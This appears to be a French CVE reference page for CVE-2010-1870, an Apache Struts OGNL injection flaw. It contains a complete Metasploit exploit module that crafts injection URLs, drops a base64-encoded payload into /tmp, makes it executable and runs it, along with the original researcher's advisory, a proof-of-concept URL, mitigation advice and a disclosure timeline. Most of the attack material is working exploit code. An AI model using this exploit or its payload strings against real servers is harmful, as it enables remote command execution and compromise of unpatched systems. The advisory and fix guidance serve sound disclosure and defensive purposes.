Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
5 |
|
AV:N/AC:L/Au:N/C:N/I:P/A:N |
[email protected] |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 17691
Date de publication : 2011-08-18 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# $Id: struts_code_exec.rb 13586 2011-08-19 05:59:32Z bannedit $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Struts < 2.2.0 Remote Command Execution',
'Description' => %q{
This module exploits a remote command execution vulnerability in
Apache Struts versions < 2.2.0. This issue is caused by a failure to properly
handle unicode characters in OGNL extensive expressions passed to the web server.
By sending a specially crafted request to the Struts application it is possible to
bypass the "#" restriction on ParameterInterceptors by using OGNL context variables.
Bypassing this restriction allows for the execution of arbitrary Java code.
},
'Author' =>
[
'bannedit', # metasploit module
'Meder Kydyraliev', # original public exploit
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 13586 $',
'References' =>
[
[ 'CVE', '2010-1870'],
[ 'OSVDB', '66280'],
[ 'URL', 'http://www.exploit-db.com/exploits/14360/' ],
],
'Platform' => [ 'win', 'linux'],
'Privileged' => true,
'Targets' =>
[
['Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
}
],
['Linux Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
],
],
'DisclosureDate' => 'Jul 13 2010',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8080),
OptString.new('URI', [ true, 'The path to a struts application action ie. /struts2-blank-2.0.9/example/HelloWorld.action', ""]),
OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
], self.class)
end
def execute_command(cmd, opts = {})
uri = Rex::Text::uri_encode(datastore['URI'])
var_a = rand_text_alpha_lower(4)
var_b = rand_text_alpha_lower(2)
var_c = rand_text_alpha_lower(4)
var_d = rand_text_alpha_lower(4)
var_e = rand_text_alpha_lower(4)
uri << "?(%27\\u0023_memberAccess[\\%27allowStaticMethodAccess\\%27]%27)(#{var_a})=true&"
uri << "(aaaa)((%27\\u0023context[\\%27xwork.MethodAccessor.denyMethodExecution\\%27]\\u003d\\u0023#{var_c}%27)(\\u0023#{var_c}\\u003dnew%20java.lang.Boolean(\"false\")))&"
uri << "(#{var_b})((%27\\u0023#{var_d}.exec(\"CMD\")%27)(\\u0023#{var_d}\\
[email protected]@getRuntime()))=1" if target['Platform'] == 'win'
uri << "(asdf)(('\\u0023rt.exec(\"CMD\".split(\"@\"))')(\\u0023rt\\
[email protected]@getRuntime()))=1" if target['Platform'] == 'linux'
uri.gsub!(/CMD/, Rex::Text::uri_encode(cmd))
vprint_status("Attemping to execute: #{cmd}")
resp = send_request_raw({
'uri' => uri,
'version' => '1.1',
'method' => 'GET',
}, 5)
end
def windows_stager
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
execute_cmdstager({ :temp => '.'})
@payload_exe = payload_exe
print_status("Attempting to execute the payload...")
execute_command(@payload_exe)
end
def linux_stager
cmds = "/bin/sh@-c@echo LINE | tee FILE"
exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
base64 = Rex::Text.encode_base64(exe)
base64.gsub!(/\=/, "\\u003d")
file = rand_text_alphanumeric(4+rand(4))
execute_command("/bin/sh@-c@touch /tmp/#{file}.b64")
cmds.gsub!(/FILE/, "/tmp/" + file + ".b64")
base64.each_line do |line|
line.chomp!
cmd = cmds
cmd.gsub!(/LINE/, line)
execute_command(cmds)
end
execute_command("/bin/sh@-c@base64 -d /tmp/#{file}.b64|tee /tmp/#{file}")
execute_command("/bin/sh@-c@chmod +x /tmp/#{file}")
execute_command("/bin/sh@-c@rm /tmp/#{file}.b64")
execute_command("/bin/sh@-c@/tmp/#{file}")
@payload_exe = "/tmp/" + file
end
def on_new_session(client)
if target['Platform'] == 'linux'
print_status("deleting #{@payload_exe} payload file")
execute_command("/bin/sh@-c@rm #{@payload_exe}")
else
print_status("Windows does not allow running executables to be deleted")
print_status("delete the #{@payload_exe} file manually after migrating")
end
end
def exploit
if not datastore['CMD'].empty?
print_status("Executing user supplied command")
execute_command(datastore['CMD'])
return
end
case target['Platform']
when 'linux'
linux_stager
when 'win'
windows_stager
else
raise RuntimeError, 'Unsupported target platform!'
end
handler
end
end
Exploit Database EDB-ID : 14360
Date de publication : 2010-07-13 22h00 +00:00
Auteur : Meder Kydyraliev
EDB Vérifié : No
Friday, July 9, 2010
CVE-2010-1870: Struts2/XWork remote command execution
Update Tue Jul 13 2010: Added proof of concept
Apache Struts team has announced uploaded but has not released, due to an unreasonably prolonged voting process, the 2.2.0 release of the Struts2 web framework which fixes vulnerability that I've reported to them on May 31st 2010. Apache Struts team is ridiculously slow in releasing the fixed version and all of my attempts to expedite the process have failed.
Introduction
Struts2 is Struts + WebWork. WebWork in turn uses XWork to invoke actions and call appropriate setters/getters based on HTTP parameter names, which is achieved by treating each HTTP parameter name as an OGNL statement. OGNL (Object Graph Navigation Language) is what turns:
user.address.city=Bishkek&user['favoriteDrink']=kumys
into
action.getUser().getAddress().setCity("Bishkek")
action.getUser().setFavoriteDrink("kumys")
This is performed by the ParametersInterceptor, which calls ValueStack.setValue() with user-supplied HTTP parameters as arguments.
NOTE: If you are using XWork's ParametersInterceptor or operate with OGNL ValueStack in a similar way then you are vulnerable (ParametersInterceptor is on by default in struts-default.xml).
In addition to property getting/setting, OGNL supports many more features:
* Method calling: foo()
* Static method calling: @java.lang.System@exit(1)
* Constructor calling: new MyClass()
* Ability to work with context variables: #foo = new MyClass()
* And more...
Since HTTP parameter names are OGNL statements, to prevent an attacker from calling arbitrary methods via HTTP parameters XWork has the following two variables guarding methods execution:
* OgnlContext's property 'xwork.MethodAccessor.denyMethodExecution' (set to true by default)
* SecurityMemberAccess private field called 'allowStaticMethodAccess' (set to false by default)
OGNL Context variables
To make it easier for developer to access various frequently needed objects XWork provides several predefined context variables:
* #application
* #session
* #request
* #parameters
* #attr
These variables represent various server-side objects, such as session map. To prevent attackers from tampering with server-side objects XWork's ParametersInterceptor disallowed # in parameter names. About a year ago I found a way to bypass that protection(XW-641) using Java's unicode String representation: \u0023. At the time I felt like the fix that was implemented (OGNL value stack clearing) was insufficient, but had not time to investigate this further.
CVE-2010-1870
Earlier this year I finally got a chance to look at this again and found that in addition to the above mentioned context variables there were more:
* #context - OgnlContext, the one guarding method execution based on 'xwork.MethodAccessor.denyMethodExecution' property value.
* #_memberAccess - SecurityMemberAccess, whose 'allowStaticAccess' field prevented static method execution.
* #root
* #this
* #_typeResolver
* #_classResolver
* #_traceEvaluations
* #_lastEvaluation
* #_keepLastEvaluation
You can probably see the problem already. Using XW-641 trick I was able to modify the values that were guarding Java methods execution and run arbitrary Java code:
#_memberAccess['allowStaticMethodAccess'] = true
#foo = new java .lang.Boolean("false")
#context['xwork.MethodAccessor.denyMethodExecution'] = #foo
#rt = @java.lang.Runtime@getRuntime()
#rt.exec('mkdir /tmp/PWNED')
Actual proof of concept had to use OGNL's expression evaluation when crafting HTTP request. PoC for this bug will be published on July 12 2010. To test whether your application is vulnerable you can use the following proof of concept, which will call java.lang.Runtime.getRuntime().exit(1):
http://mydomain/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.den
yMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\
[email protected]@getRunti
me()))=1
Fixing CVE-2010-1870
Struts2 users must upgrade to the 2.2.0, which whitelists a set of characters that excludes characters required to exploit this vulnerability.
In cases where upgrade isn't possible you can use ParameterInterceptor's "excludeParams" parameter to whitelist the characters required for your application to operate correctly(usually A-z0-9_.'"[]) alternatively you can blacklist \()@ which are the characters required to exploit this bug.
Timeline
May 31st - email to
[email protected] with vulnerability report.
June 4th - no response received, contacted developers again.
June 5th - had to find an XWork developer on IRC to look at this.
June 16th - Atlassian fixes vulnerability in its products. Atlassian and Struts developers worked together in coming up with the fix.
June 20th - 1-line fix commited
June 29th - Struts 2.2.0 release voting process started and is still going...
Products Mentioned
Configuraton 0
Apache>>Struts >> Version 2.0.0
Apache>>Struts >> Version 2.0.1
Apache>>Struts >> Version 2.0.2
Apache>>Struts >> Version 2.0.3
Apache>>Struts >> Version 2.0.4
Apache>>Struts >> Version 2.0.5
Apache>>Struts >> Version 2.0.6
Apache>>Struts >> Version 2.0.7
Apache>>Struts >> Version 2.0.8
Apache>>Struts >> Version 2.0.9
Apache>>Struts >> Version 2.0.10
Apache>>Struts >> Version 2.0.11
Apache>>Struts >> Version 2.0.11.1
Apache>>Struts >> Version 2.0.11.2
Apache>>Struts >> Version 2.0.12
Apache>>Struts >> Version 2.0.13
Apache>>Struts >> Version 2.0.14
Apache>>Struts >> Version 2.1.0
Apache>>Struts >> Version 2.1.1
Apache>>Struts >> Version 2.1.2
Apache>>Struts >> Version 2.1.3
Apache>>Struts >> Version 2.1.4
Apache>>Struts >> Version 2.1.5
Apache>>Struts >> Version 2.1.6
Apache>>Struts >> Version 2.1.8
Apache>>Struts >> Version 2.1.8.1
Références